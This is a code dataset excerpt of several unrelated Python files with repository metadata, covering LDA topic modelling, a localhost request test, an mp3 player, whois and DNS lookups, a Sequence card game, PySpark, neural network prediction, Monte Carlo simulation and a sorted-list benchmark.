lsUnWantedWords=mlf.readFile('removed_words.txt')\r\n for word in lsUnWantedWords:\r\n sw.append(word.strip())\r\n \r\n #Read the Notsure words and then add them up to stopwords\r\n lsNotSureWords=[]\r\n lsNotSureWords=mlf.readFile('notsure_words.txt')\r\n for word in lsNotSureWords:\r\n sw.append(word.strip())\r\n \r\n lsDocuments_NoSW = [[word for word in simple_preprocess(str(doc)) if word not in sw] for doc in lsDocuments]\r\n\r\n\r\n if(op==1):\r\n print('LDA model with gensim for 1 gram')\r\n \r\n if(op==2):\r\n print('LDA model with gensim for 2 gram')\r\n bigram = gensim.models.Phrases(lsDocuments_NoSW, min_count=5, threshold=100)\r\n bigram_mod = gensim.models.phrases.Phraser(bigram)\r\n lsDocBiGram = [bigram_mod[doc] for doc in lsDocuments_NoSW]\r\n lsDocuments_NoSW.clear()\r\n lsDocuments_NoSW = [[word for word in simple_preprocess(str(doc)) if word not in sw] for doc in lsDocBiGram]\r\n \r\n\r\n if(op==3):\r\n print('LDA model with gensim for 3 gram')\r\n bigram = gensim.models.Phrases(lsDocuments_NoSW, min_count=5, threshold=100)\r\n bigram_mod = gensim.models.phrases.Phraser(bigram)\r\n trigram = gensim.models.Phrases(bigram[lsDocuments_NoSW], threshold=100)\r\n trigram_mod = gensim.models.phrases.Phraser(trigram)\r\n lsDocTrigram = [trigram_mod[doc] for doc in lsDocuments_NoSW]\r\n lsDocuments_NoSW.clear()\r\n lsDocuments_NoSW = [[word for word in simple_preprocess(str(doc)) if word not in sw] for doc in lsDocTrigram]\r\n \r\n \"\"\"\r\n print('Getting bigrams list...')\r\n for doc in lsDocuments_NoSW:\r\n for word in doc:\r\n mlf.appendInfoToFile(pathtohere,'\\\\trigrams.txt',word+'\\n')\r\n\r\n \"\"\" \r\n\r\n if (op==4):\r\n print('Starting coherence ranking with 2 gram...') \r\n #Generate best coherence ranking\r\n # Create Dictionary\r\n id2word = corpora.Dictionary(lsDocuments_NoSW)\r\n # Create Corpus: Term Document Frequency\r\n corpus = [id2word.doc2bow(text) for text in lsDocuments_NoSW]\r\n bigram = gensim.models.Phrases(lsDocuments_NoSW, min_count=5, threshold=100)\r\n bigram_mod = gensim.models.phrases.Phraser(bigram)\r\n lsDocBiGram = [bigram_mod[doc] for doc in lsDocuments_NoSW]\r\n lsDocuments_NoSW.clear()\r\n lsDocuments_NoSW = [[word for word in simple_preprocess(str(doc)) if word not in sw] for doc in lsDocBiGram]\r\n limit=51; start=2; step=1;\r\n model_list, coherence_values = mlf.compute_coherence_values(dictionary=id2word, corpus=corpus, texts=lsDocuments_NoSW, start=start, limit=limit, step=step)\r\n print('Plotting ranking...')\r\n # Show graph\r\n \r\n x = range(start, limit, step)\r\n plt.plot(x, coherence_values)\r\n plt.xlabel(\"Num Topics\")\r\n plt.ylabel(\"Coherence score\")\r\n plt.legend((\"coherence_values\"), loc='best')\r\n plt.show() \r\n sys.exit()\r\n\r\n # id2word :Create Dictionary, this dictionary has the id and word\r\n \r\n id2word = corpora.Dictionary(lsDocuments_NoSW)\r\n\r\n # Term Document Frequency\r\n #Gensim creates a unique id for each word in the document. \r\n #The produced corpus shown above is a mapping of (word_id, word_frequency).\r\n \r\n corpus = [id2word.doc2bow(text) for text in lsDocuments_NoSW]\r\n #Example: it has 37, 342 indexes, so 0 to 37, 341 \r\n columns=len(id2word) \r\n #Generate list of columns\r\n lsColumn=[]\r\n for i in range(0,columns):\r\n lsColumn.append(str(i));\r\n #Generate the indexes (id_thesis)\r\n lsIndex=[] \r\n lsIndex=mlf.readFile('lsThesis.txt')\r\n term_matrix=[]\r\n lim=columns-1\r\n countDoc=0\r\n for doc in corpus:\r\n strdoc=''\r\n for i in range(0,columns): \r\n bFound=False \r\n for index_word,value in doc: \r\n #Case: When the document has that index word \r\n if int(i)!=lim:\r\n if i==index_word: \r\n bFound=True \r\n if i==0:\r\n strdoc='('\r\n if int(index_word)==i:\r\n strdoc=strdoc+str(value)+',' \r\n break \r\n #Case: End of columns then add value and ')' \r\n else: \r\n if i==index_word: \r\n bFound=True \r\n if int(index_word)==i:\r\n strdoc=strdoc+str(value)+')' \r\n break \r\n if bFound==False:\r\n strdoc=strdoc+'0,' \r\n if bFound==False and i==lim:\r\n strdoc=strdoc+'0)'\r\n\r\n #mlf.appendInfoToFile(pathtohere+'\\\\','vectors.txt',strdoc) \r\n term_matrix.append(strdoc)\r\n countDoc=countDoc+1\r\n print('Doc:',str(countDoc)) \r\n \r\n\r\n dataFrame = pd.DataFrame(term_matrix) \r\n for row in dataFrame.iterrows():\r\n mlf.appendInfoToFile(pathtohere+'\\\\','dataFrameContent.txt',str(row))\r\n\r\n sys.exit()\r\n\r\n #Print the id and word \r\n \"\"\"\r\n for element in lsSubject:\r\n mlf.appendInfoToFile(pathtohere+'\\\\','lsSubject.txt',str(element)+'\\n') \r\n \r\n #Get the word and its ID.\r\n for key,value in id2word.token2id.items():\r\n mlf.appendInfoToFile(pathtohere+'\\\\','id2word.txt',str(key)+';'+str(value)+'\\n') \r\n\r\n \"\"\" \r\n \r\n print('LDA Model starting...')\r\n # Build LDA model\r\n lda_model = gensim.models.ldamodel.LdaModel(corpus=corpus,\r\n id2word=id2word,\r\n num_topics=numberTopic)\r\n\r\n \"\"\"\r\n print('Printing topics')\r\n lda_topics=lda_model.print_topics()\r\n for topic in lda_topics:\r\n mlf.appendInfoToFile(pathtohere,'\\\\list_of_topics_lda.txt',str(topic)+'\\n')\r\n \"\"\"\r\n \r\n df=pd.DataFrame()\r\n df=mlf.getDominantTopicDataFrame(lda_model,corpus,lsDocuments_NoSW,lsSubject) \r\n mlf.generateFileSeparatedBySemicolon(df,str(op)+'gram_csv_'+str(numberTopic)+'_withoutCompleteList.txt') \r\n \r\n mlf.generatePyLDAVis(lda_model,corpus,'vis_'+str(op)+'gram_'+str(numberTopic)+'_withoutCompleteList.html')\r\n \r\n \"\"\"\r\n lda_cm=CoherenceModel(model=lda_model,corpus=corpus,dictionary=id2word,texts=lsDocuments_NoSW)\r\n print('LDA Coherence:',lda_cm.get_coherence()) \r\n \"\"\"\r\n\r\n\r\nif __name__=='__main__':\r\n main() \r\n","repo_name":"ulysesrico33/appPythonML","sub_path":"topicModeling_gensim_LDA.py","file_name":"topicModeling_gensim_LDA.py","file_ext":"py","file_size_in_byte":7663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25811417423","text":"# 模拟30个请求\n# 发给 http://127.0.0.1:8000/test\n# 发给 http://127.0.0.1:8001/test\n\nimport random\nfrom threading import Thread\nimport requests\n\n# 随机向8000或8001发请求\ndef get_request():\n url = 'http://127.0.0.1:8000/test'\n url2 = 'http://127.0.0.1:8000/test'\n get_url = random.choice([url,url2])\n res = requests.get(get_url)\n print('request OK')\n\nt_list = []\n\nfor i in range(30):\n t = Thread(target=get_request)\n t_list.append(t)\n t.start()\n print(i)\n\nfor t in t_list:\n t.join()\n\n\n","repo_name":"tomcatcn/wiki","sub_path":"tools/test_lock.py","file_name":"test_lock.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71092651987","text":"# Tocando um arquivo mp3.\n\n# Import the modules\n\nimport pygame\nfrom pygame import mixer\n\n# Instancia mixer\nmixer.init()\n\n# Carrega um arquivo de música\nmixer.music.load('ex021.mp3')\n\n# Dá um play na música\nmixer.music.play()\nprint(\"Tocando a música...\")\n\nwhile True:\n print(\"-----------------------------------------------\")\n print(\"Pressione P para Pausar.\")\n print(\"Pressione R para dar Play.\")\n print(\"Pressione E para sair.\")\n\n userInput = input(\" \")\n\n if userInput == 'p':\n\n mixer.music.pause()\n print('Música pausada.')\n elif userInput == 'r':\n mixer.music.unpause()\n print(\"Música está tocando.\")\n elif userInput == 'e':\n print(\"Você saiu do player\")\n break\n","repo_name":"GabrielVictorino8266/python","sub_path":"cursoemvideo/Mundo1/exercises/ex021.py","file_name":"ex021.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15531369915","text":"import whois\nimport logging\nimport json\nimport dns.resolver\n\nunique_domains = ['youtu.be']\n\n\ndef get_nslookup(domain):\n\n # records = ['A', 'AAAA', 'CNAME', 'MX', 'NS', 'SOA', 'TXT']\n records = {\n 'A': [],\n 'AAAA': [],\n 'CNAME': [],\n 'MX': [],\n 'NS': [],\n 'SOA': [],\n 'TXT': []\n }\n for record in records.keys():\n try:\n nslookup = dns.resolver.query(domain, record)\n # print('nslookup:', nslookup)\n for server in nslookup:\n # print(record + ': ' + str(server))\n records[record].append(str(server))\n except Exception as e:\n print(e)\n # submitError(link=link)\n logging.info(\"NS Lookup fetched... ✅\")\n print(\"NS Lookup: \" + json.dumps(records, indent=4, sort_keys=True))\n return records\n\n\ndef getWhois(parsed_url):\n try:\n whois_data = whois.whois(parsed_url['domain'])\n\n if ('domain_name' in whois_data.keys()):\n domain_name = whois_data['domain_name'][0] if type(\n whois_data['domain_name']) is list else whois_data['domain_name']\n\n else:\n if (parsed_url['domain'] in unique_domains):\n domain_name = parsed_url['domain']\n else:\n # print('domain_name not found')\n logging.error(\"domain_name not found... 👻\")\n\n return\n\n # convert domain_name to lowercase\n domain_name = domain_name.lower()\n\n # print('domain_name: ', domain_name)\n\n if ('registrar' in whois_data.keys()):\n registrar = whois_data['registrar']\n else:\n registrar = None\n\n whoisServer = whois_data['whois_server'] if 'whois_server' in whois_data.keys(\n ) else None\n\n if 'updatedDate' in whois_data.keys():\n updatedDate = whois_data['updated_date'] if type(\n whois_data['updated_date']) is list else [whois_data['updated_date']]\n else:\n updatedDate = None\n\n if 'creation_date' in whois_data.keys():\n creationDate = whois_data['creation_date'][0] if type(\n whois_data['creation_date']) is list else whois_data['creation_date']\n else:\n creationDate = None\n\n if 'expiration_date' in whois_data.keys():\n expirationDate = whois_data['expiration_date'][0] if type(\n whois_data['expiration_date']) is list else whois_data['expiration_date']\n else:\n expirationDate = None\n\n if 'name_servers' in whois_data.keys():\n nameServers = whois_data['name_servers']\n else:\n nameServers = None\n\n if 'status' in whois_data.keys():\n status = whois_data['status'] if type(whois_data['status']) is list else [\n whois_data['status']]\n else:\n status = None\n\n if 'emails' in whois_data.keys():\n emails = whois_data['emails'] if type(whois_data['emails']) is list else [\n whois_data['emails']]\n else:\n emails = None\n\n if 'dnssec' in whois_data.keys():\n dnssec = whois_data['dnssec'] if type(whois_data['dnssec']) is list else [\n whois_data['dnssec']]\n else:\n dnssec = None\n\n if 'name' in whois_data.keys():\n name = whois_data['name'] if whois_data['name'] else None\n else:\n name = None\n\n if 'org' in whois_data.keys():\n org = whois_data['org'] if whois_data['org'] else None\n else:\n org = None\n\n if 'address' in whois_data.keys():\n address = whois_data['address'] if whois_data['address'] else None\n else:\n address = None\n\n if 'city' in whois_data.keys():\n city = whois_data['city'] if whois_data['city'] else None\n else:\n city = None\n\n if 'country' in whois_data.keys():\n country = whois_data['country'] if whois_data['country'] else None\n else:\n country = None\n\n if 'state' in whois_data.keys():\n state = whois_data['state'] if whois_data['state'] else None\n else:\n state = None\n\n if 'address' in whois_data.keys():\n address = address if type(address) is list else [address]\n else:\n address = None\n\n if address and address[0] is None:\n address = None\n if updatedDate and updatedDate[0] is None:\n updatedDate = None\n if status and status[0] is None:\n status = None\n if emails and emails[0] is None:\n emails = None\n if dnssec and dnssec[0] is None:\n dnssec = None\n\n logging.info(\"whois data collected... 📝\")\n\n print(\n 'domain:', domain_name,\n '\\nregistrar:', registrar,\n '\\nwhoisServer:', whoisServer,\n '\\nupdatedDate:', updatedDate,\n '\\ncreationDate:', creationDate,\n '\\nexpirationDate:', expirationDate,\n '\\nnameServers:', nameServers,\n '\\nstatus:', status,\n '\\nemails:', emails,\n '\\ndnssec:', dnssec,\n '\\nname:', name,\n '\\norg:', org,\n '\\naddress:', address,\n '\\ncity:', city,\n '\\ncountry:', country,\n '\\nstate:', state\n )\n\n except Exception as e:\n print(e)\n # submitError(link=link)\n\n\nif __name__ == '__main__':\n getWhois({'domain': 'google.com'})\n get_nslookup('google.com')\n","repo_name":"Amansinghtech/python-whois","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9104975971","text":"class Solution(object):\n def change(self, amount, coins):\n \"\"\"\n :type amount: int\n :type coins: List[int]\n :rtype: int\n \"\"\"\n change = [0] * (amount+1)\n change[0] = 1 # can always make 0 change\n for c in coins:\n for i in range(c,amount+1):\n change[i] = change[i] + change[i-c]\n return change[amount]","repo_name":"BlakeBrown/LeetCode-Solutions","sub_path":"518 - Coin Change 2.py","file_name":"518 - Coin Change 2.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"1986974977","text":"import random\nfrom collections import defaultdict\nfrom PyQt6.QtWidgets import QLabel\nfrom backend.player import player\n\n\nclass Game:\n def __init__(self):\n self.deck = [\n f\"{i}{j}\"\n for i in list(\"KQJA\") + list(map(str, range(2, 11)))\n for j in \"SHCD\"\n ] * 2\n\n self.board = [\n [\"XX\", \"6D\", \"7D\", \"8D\", \"9D\", \"10D\", \"QD\", \"KD\", \"AD\", \"XX\"],\n [\"5D\", \"3H\", \"2H\", \"2S\", \"3S\", \"4S\", \"5S\", \"6S\", \"7S\", \"AC\"],\n [\"4D\", \"4H\", \"KD\", \"AD\", \"AC\", \"KC\", \"QC\", \"10C\", \"8S\", \"KC\"],\n [\"3D\", \"5H\", \"QD\", \"QH\", \"10H\", \"9H\", \"8H\", \"9C\", \"9S\", \"QC\"],\n [\"2D\", \"6H\", \"10D\", \"KH\", \"3H\", \"2H\", \"7H\", \"8C\", \"10S\", \"10C\"],\n [\"AS\", \"7H\", \"9D\", \"AH\", \"4H\", \"5H\", \"6H\", \"7C\", \"QS\", \"9C\"],\n [\"KS\", \"8H\", \"8D\", \"2C\", \"3C\", \"4C\", \"5C\", \"6C\", \"KS\", \"8C\"],\n [\"QS\", \"9H\", \"7D\", \"6D\", \"6D\", \"4D\", \"QD\", \"2D\", \"AS\", \"7C\"],\n [\"10S\", \"10H\", \"QH\", \"KH\", \"AH\", \"2C\", \"3C\", \"4C\", \"5C\", \"6C\"],\n [\"XX\", \"9S\", \"8S\", \"7S\", \"6S\", \"5S\", \"4S\", \"3S\", \"2S\", \"XX\"],\n ]\n\n random.shuffle(self.deck)\n self.pos = defaultdict(list)\n self.used = defaultdict(int)\n self.coins = defaultdict(QLabel)\n self.filled = [[0] * 10 for _ in \" \" * 10]\n self.winner = False\n\n def storeLocations(self):\n for i in range(10):\n for j in range(10):\n self.pos[self.board[i][j]] += ((i, j),)\n\n def distribute(self, player: player):\n for _ in range(5):\n player.addCard(self.getNewCard())\n\n def getNewCard(self):\n while self.deck:\n newCard = self.deck.pop()\n if not self.used[newCard] == 2:\n self.used[newCard] += 1\n return newCard\n return False\n\n def checkSequence(self, x, y, obj):\n # check up - down\n\n total = 0\n b = d = y\n while b >= 0:\n if obj.playerBox[x][b]:\n total += 1\n else:\n break\n b -= 1\n\n while d < 10:\n if obj.playerBox[x][d]:\n total += 1\n else:\n break\n d += 1\n\n obj.playerScore += total >= 6\n\n # check left - right\n\n total = 0\n a = c = x\n while a:\n if obj.playerBox[a][y]:\n total += 1\n else:\n break\n a -= 1\n\n while c < 10:\n if obj.playerBox[c][y]:\n total += 1\n else:\n break\n c += 1\n\n obj.playerScore += total >= 6\n\n # check left - diagonal\n\n total = 0\n a = c = x\n b = d = y\n while a and b:\n if obj.playerBox[a][b]:\n total += 1\n else:\n break\n a -= 1\n b -= 1\n\n while c < 10 and d < 10:\n if obj.playerBox[c][d]:\n total += 1\n else:\n break\n c += 1\n d += 1\n\n obj.playerScore += total >= 6\n\n # check right - diagonal\n\n total = 0\n a = c = x\n b = d = y\n while a and b < 9:\n if obj.playerBox[a][b]:\n total += 1\n else:\n break\n a -= 1\n b += 1\n\n while c < 9 and d:\n if obj.playerBox[c][d] == obj.playerBox[c + 1][d - 1]:\n total += 1\n else:\n break\n c += 1\n d -= 1\n\n obj.playerScore += total >= 6\n if obj.playerScore > 0:\n self.winner = True\n\n def setBox(self, player: player, opponent, x, y):\n if self.board[x][y] == \"XX\":\n return False\n\n ok = player.hasChosenValid(x, y, opponent, self.board[x][y])\n if ok == 0:\n print(\"NOT VALID\", self.board[x][y], player.playerCards)\n\n elif ok == 1:\n player.playerBox[x][y] = 1\n self.checkSequence(x, y, player)\n self.filled[x][y] = 1\n return ok\n\n else:\n self.filled[x][y] = 0\n opponent[x][y] = 0\n\n return ok\n\n def makeRandomMove(self, player: player, opponent: player):\n while True:\n card = random.choice(player.playerCards) # one eye jack\n if card in (\"JH\", \"JS\"):\n for i in range(10):\n for j in range(10):\n if self.board[i][j] == \"XX\":\n continue\n if opponent.playerBox[i][j]:\n opponent.playerBox[i][j] = 0\n player.playerCards.remove(card)\n self.filled[i][j] = 0\n player.addCard(self.getNewCard())\n return (i, j, 0)\n return False\n\n elif card in (\"JD\", \"JC\"): # two eye jack\n for i in range(10):\n for j in range(10):\n if self.board[i][j] == \"XX\":\n continue\n if (\n player.playerBox[i][j] == 0\n and opponent.playerBox[i][j] == 0\n ):\n player.playerBox[i][j] = 1\n self.filled[i][j] = 1\n self.checkSequence(i, j, player)\n player.playerCards.remove(card)\n player.addCard(self.getNewCard())\n return (i, j, 1)\n return False\n\n else: # normal card\n for i in range(10):\n for j in range(10):\n if self.board[i][j] == \"XX\":\n continue\n if (\n self.board[i][j] == card\n and player.playerBox[i][j] == opponent.playerBox[i][j] == 0\n ):\n self.filled[i][j] = 1\n player.playerBox[i][j] = 1\n self.checkSequence(i, j, player)\n player.playerCards.remove(card)\n player.addCard(self.getNewCard())\n return (i, j, 1)\n\n player.playerCards.remove(card)\n player.addCard(self.getNewCard())\n return False\n","repo_name":"heksadecimal/sequence","sub_path":"src/backend/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"7716174783","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, StructField, IntegerType, StringType\n\n\"\"\"\n Dataframe from array\n\"\"\"\n\n__all__ = [\"smartphones_dataframe\"]\n\n\ndef smartphones_dataframe(spark: SparkSession):\n data_array = [[\"Apple\", \"iPhone X\", \"IOS\", 46], [\"Xiaomi\", \"Mi 9\", \"Android\", 54]]\n schema = StructType([StructField('make', StringType(), True),\n StructField('model', StringType(), True),\n StructField('platform', StringType(), True),\n StructField('camera_megapixels', IntegerType(), True)])\n df_from_array = spark.createDataFrame(data_array, schema)\n print(\"Smartphone DataFrame: \")\n df_from_array.show(5)\n\n return df_from_array\n","repo_name":"thaapontes/pyspark-etl","sub_path":"ingested_dataframes/smartphones_df.py","file_name":"smartphones_df.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31593026269","text":"##To run the code type in terminal: python3 180123057_MOHAMMAD_HUMAM_KHAN.py\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nfrom matplotlib import cm\nfrom scipy.stats import multivariate_normal\nimport random\nimport math\nimport numpy as np\nimport statistics\n\n\n\n\n\n#Function to calculate Normal density at a point x\ndef normal_density(mu, sigma, x):\n\ty = (1/math.sqrt(2 * math.pi * sigma)) * math.exp(-0.5 * ((x-mu)/sigma)**2)\n\treturn y\n\n\n\n#Calculating Frequencies for different intervals\ndef calculate_frequency(results, intervals, freq, sigma,rounds):\n\tfor i in results:\n\t\tfor j in range(len(intervals)):\n\t\t\tif (i <= intervals[j]):\n\t\t\t\tfreq[j] = freq[j] + 1\n\t\t\t\tbreak\n\tfor i in range(len(intervals)):\n\t\tfreq[i] = freq[i]*math.sqrt(sigma)/(2*rounds/10)\n\n\n\n##Plotting the results\ndef plot_result(intervals,freq,mu,sigma,a,var,name):\n\t\n\tplt.figure(figsize=(20,12))\n\tplt.title(\"Marginal Density Plot of %s \\n a = %s\" % (var,a),fontsize=20)\n\tplt.ylabel(\"Scaled frequency Values\", fontsize=15)\n\tplt.xlabel(\"Intervals\", fontsize=15)\n\tplt.plot(intervals[1:], freq[1:])\n\tplt.scatter(intervals[1:], freq[1:])\n\n\tr = np.linspace(mu-4*sigma,mu+4*sigma,5000,endpoint=True)\n\ty = []\n\tfor i in range(5000):\n\t\ty.append(normal_density(mu, sigma, r[i]))\n\tplt.plot(r, y, color='r')\n\tplt.savefig(name)\n\tplt.clf()\n\n\n\n#Function to Plot 3D density for different values of a\ndef plot3D_density(X1,X2,mu1,mu2,sigma1,sigma2,a,rounds,name):\n\t\n\tX_start = mu1 - 4*sigma1\n\tX_end = mu1 + 4*sigma1\n\tY_start = mu2 - 4*sigma2\n\tY_end = mu2 + 4*sigma2\n\tX_intervals = np.linspace(X_start,X_end,100,endpoint=True)\n\tY_intervals = np.linspace(Y_start,Y_end,100,endpoint=True)\n\tXY_freq = np.array([[0]*100]*100)\n\n\n\tX_interval_size = (X_end-X_start)/100\n\tY_interval_size = (Y_end-Y_start)/100\n\n\t#Calculating frequency of intervals\n\tfor i in range(rounds):\n\t\tj = math.floor((X1[i]-X_start)/X_interval_size)\n\t\tk = math.floor((X2[i]-Y_start)/Y_interval_size)\n\t\tif j>=100 or k>=100:\n\t\t\tcontinue\n\t\tXY_freq[j][k] = XY_freq[j][k] + 1\n\n\n\t#Plotting Simulated Density \n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\tax.set_title(\"Bivariate Density of Simulated Points (X) in 3D \\n a = %s\" % a)\n\tax.set_xlabel('X axis')\n\tax.set_ylabel('Y axis')\n\tax.set_zlabel('Z axis')\n\n\tX_intervals, Y_intervals = np.meshgrid(X_intervals, Y_intervals)\n\tax.plot_surface(X_intervals, Y_intervals, XY_freq,cmap=cm.coolwarm)\n\tplt.savefig(name+\"_3\")\n\tplt.clf()\n\n\n\t##Plotting Actual Bivariate Normal density \n\n\tX = np.linspace(X_start,X_end, 1000,endpoint=True)\n\tY = np.linspace(Y_start,Y_end, 1000,endpoint=True)\n\tX, Y = np.meshgrid(X, Y)\n\n\tmu = np.array([5, 8])\n\n\t#Handling Corner Case for a = 1\n\tif a!=1:\n\t\tSigma = np.array([[ 1. , 2.0*a], [2.0*a, 4.]])\n\t\n\tif a==1:\n\t\tSigma = np.array([[ 1. , 2.0*0.99999], [2.0*0.99999, 4.]])\n\n\tpos = np.empty(X.shape + (2,))\n\tpos[:, :, 0] = X\n\tpos[:, :, 1] = Y\n\n\tF = multivariate_normal(mu, Sigma)\n\tZ = F.pdf(pos)\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\tax.set_title(\"Actual Bivariate Density of X in 3D \\n a = %s\" % a)\n\tax.set_xlabel('X axis')\n\tax.set_ylabel('Y axis')\n\tax.set_zlabel('Z axis')\n\tax.plot_surface(X,Y,Z,cmap=cm.coolwarm,linewidth=0, antialiased=True)\n\tplt.savefig(name+\"_4\")\n\tplt.clf()\n\n\n\n\n\n#Function to Simulate Bivariate Normal\ndef Simulate(a,name):\n\n\tmu1 = 5\n\tmu2 = 8\n\n\tsigma1 = 1\n\tsigma2 = 2\n\n\trho = a\n\n\trounds = 1000\n\tZ1 = np.random.normal(0,1,rounds)\n\tZ2 = np.random.normal(0,1,rounds)\n\n\tX1 = mu1 + sigma1*Z1\n\tX2 = mu2 + (rho * sigma2 * Z1) + (math.sqrt(1 - rho**2) * sigma2 * Z2) \n\n\n\tintervals = []\n\tval = mu1-5\n\tfor i in range(50):\n\t\tintervals.append(round(val,2))\n\t\tval += 0.2\t\n\n\n\tfreq = [0]*50\n\tcalculate_frequency(X1, intervals, freq, sigma1,rounds)\n\tplot_result(intervals, freq, mu1, sigma1,a,\"X1\",name+\"_1\")\n\n\n\tintervals.clear()\n\tval = mu2-8\n\tfor i in range(80):\n\t\tintervals.append(round(val,2))\n\t\tval += 0.2\t\n\n\n\tfreq = [0]*80\n\tcalculate_frequency(X2, intervals, freq, sigma2,rounds)\n\tplot_result(intervals, freq, mu2, sigma2,a,\"X2\",name+\"_2\")\n\n\n\tplot3D_density(X1,X2,mu1,mu2,sigma1,sigma2,a,rounds,name)\n\n\n\n\n\n\n\n\n#Calling function to simulate for different values of a\nSimulate(-0.5,\"plot1\")\nSimulate(0,\"plot2\")\nSimulate(0.5,\"plot3\")\nSimulate(1,\"plot4\")\n\n\n","repo_name":"humamkhan2k/MA-323-Monte-Carlo-Simulation","sub_path":"LAB 6/180123057_MOHAMMAD_HUMAM_KHAN.py","file_name":"180123057_MOHAMMAD_HUMAM_KHAN.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30858742349","text":"from __future__ import print_function, unicode_literals\n\nfrom PyInquirer import style_from_dict, Token, prompt, Separator\nfrom pprint import pprint\n\n\ndef present_menu(suggestions):\n\n style = style_from_dict(\n {\n Token.Separator: \"#cc5454\",\n Token.QuestionMark: \"#673ab7 bold\",\n Token.Selected: \"#cc5454\", # default\n Token.Pointer: \"#673ab7 bold\",\n Token.Instruction: \"\", # default\n Token.Answer: \"#f44336 bold\",\n Token.Question: \"\",\n }\n )\n\n questions = [\n {\n \"type\": \"checkbox\",\n \"message\": \"Select which jobs to share on LinkedIn:\",\n \"name\": \"posts\",\n \"choices\": [],\n \"validate\": lambda answer: \"You must choose at least one option.\"\n if len(answer) == 0\n else True,\n }\n ]\n\n # Load menu options.\n questions[0][\"choices\"].append(Separator(\"{:=^40}\".format(\"OPTIONS\")))\n for job in suggestions:\n questions[0][\"choices\"].append(\n {\"name\": \"{:<32}: {:>32}\".format(job[\"title\"], job[\"guid\"])}\n )\n questions[0][\"choices\"].append({\"name\": \"None\"})\n\n answers = prompt(questions, style=style)\n if \"None\" in answers[\"posts\"]:\n return None\n return answers\n","repo_name":"jtroussard/linkedin_assist","sub_path":"linkedin_assist/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33256694371","text":"# Hayden Feddock\r\n# 3/30/2023\r\n\r\nimport numpy as np\r\nimport sigmoid\r\n\r\n# Function that performs feed-forward propagation algorithm\r\ndef predict(Theta1, Theta2, X):\r\n \r\n # Create the bias term a^1_0\r\n a1_0 = np.ones([X.shape[0], 1])\r\n \r\n # Add the bias term to the inputs a^1\r\n a1 = np.hstack([a1_0, X])\r\n \r\n # Create the hidden layer a^2 by computing the sigmoid function of the dot product of theta1 and a^1\r\n a2 = sigmoid.sigmoid(a1 @ Theta1.T)\r\n \r\n # Create the bias term a^2_0\r\n a2_0 = np.ones([a1.shape[0], 1])\r\n \r\n # Add the bias term to the inputs a^2\r\n a2 = np.hstack([a2_0, a2])\r\n \r\n # Create the output layer h_x by computing the sigmoid function of the dot product of theta2 and a^2\r\n h_x = sigmoid.sigmoid(a2 @ Theta2.T)\r\n \r\n # Predict the label for each class as the output with the highest probability (add 1 for proper class)\r\n p = np.argmax(h_x, axis=1) + 1\r\n \r\n # Return the predicted class label and the array of output probabilities\r\n return [p, h_x]","repo_name":"Feddockh/Learning_ML","sub_path":"HW_7/ps7_python_Feddock_Hayden/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21007486226","text":"\"\"\"\nsortedcontainers.sortedlist source code:\nhttps://grantjenks.com/docs/sortedcontainers/sortedlist.html\n\"\"\"\nimport sortedcontainers.sortedlist as sortedlist\nimport time\nimport random\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef measure_times(datastructure, dataset):\n \"\"\"\n Measures the run time of a function for different sizes of input and stores the results in a dictionary.\n :param datastructure: Data structure to measure\n :param dataset: Dictionary mapping size of input to list of run times \n \"\"\"\n \n start = 0\n end = 0\n random.seed(0)\n n = 10\n while end - start < 3:\n # Increase size of input\n n = n*10\n # Generate random array of size n\n arr = [random.randint(0, n) for _ in range(n)]\n \n if dataset.get(n) == None:\n dataset[n] = []\n # Measure run time if data structure is a multiset\n if type(datastructure) == sortedlist.SortedList:\n start = time.time()\n for i in arr:\n datastructure.add(i)\n end = time.time()\n # Store run time\n dataset[n].append((end - start)/n)\n\n # Measure run time if data structure is a vector\n else:\n start = time.time()\n for i in arr:\n # Run binary search to find index to insert element\n left = 0\n right = len(datastructure) - 1\n mid = 0\n while left <= right:\n mid = (left + right) // 2\n if datastructure[mid] < i:\n left = mid + 1\n elif datastructure[mid] > i:\n right = mid - 1\n else:\n break\n # Insert element\n datastructure.insert(mid, i)\n end = time.time()\n # Store run time\n dataset[n].append((end - start)/n)\n\n\n print(type(datastructure),\" n: \",n)\n \n\nif __name__ == \"__main__\":\n # Data structures\n multiset = sortedlist.SortedList()\n vector = []\n\n # Dictionary mapping size of input to list of run times\n vector_times = {}\n multiset_times = {}\n\n for i in range(10):\n # Measure run times\n measure_times(vector, vector_times)\n measure_times(multiset, multiset_times)\n\n # Reset data structures\n vector = []\n multiset = sortedlist.SortedList()\n\n # Plot results\n df = pd.DataFrame.from_dict(vector_times, orient='index')\n df = df.transpose()\n df = df.melt(var_name='n', value_name='time')\n df['n'] = df['n'].astype(int)\n df['time'] = df['time'].astype(float)\n sns.lineplot(x='n', y='time', data=df)\n 